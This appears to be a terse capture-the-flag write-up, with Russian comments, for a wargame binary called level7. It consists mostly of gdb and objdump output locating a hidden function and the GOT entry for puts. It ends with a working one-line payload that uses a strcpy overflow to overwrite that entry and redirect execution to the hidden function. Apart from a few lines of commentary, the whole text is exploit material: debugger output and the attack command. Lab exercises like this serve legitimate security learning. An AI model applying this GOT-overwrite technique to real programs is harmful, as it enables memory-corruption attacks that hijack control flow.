gdb
disas main
...
0x080485ba <+153>:	mov    %eax,(%esp)
0x080485bd <+156>:	call   0x80483e0 <strcpy@plt>
0x080485c2 <+161>:	mov    $0x80486e9,%edx
...

info functions
...
0x080484d0  frame_dummy
0x080484f4  m
0x08048521  main
0x08048610  __libc_csu_init
...

Нашли спрятанную функцию m, которая позволит нам получить пароль. Мы также можем использовать уязвимость функции strcpy в main, чтобы создать переполнение.

objdump -TR ./level7
...
08049920 R_386_JUMP_SLOT   strcpy
08049924 R_386_JUMP_SLOT   malloc
08049928 R_386_JUMP_SLOT   puts
...

x m
...
0x80484f4 <m>:	0x83e58955
...

Необходимо переместить адрес с точки puts 0x08049928 на точку m 0x80484f4.
offset = 20 (0x37614136)

---------------------------------------------------------------------------------
./level7 `python -c 'print "A"*20 + "\x28\x99\x04\x08" + " " + "\xf4\x84\x04\x08"'`

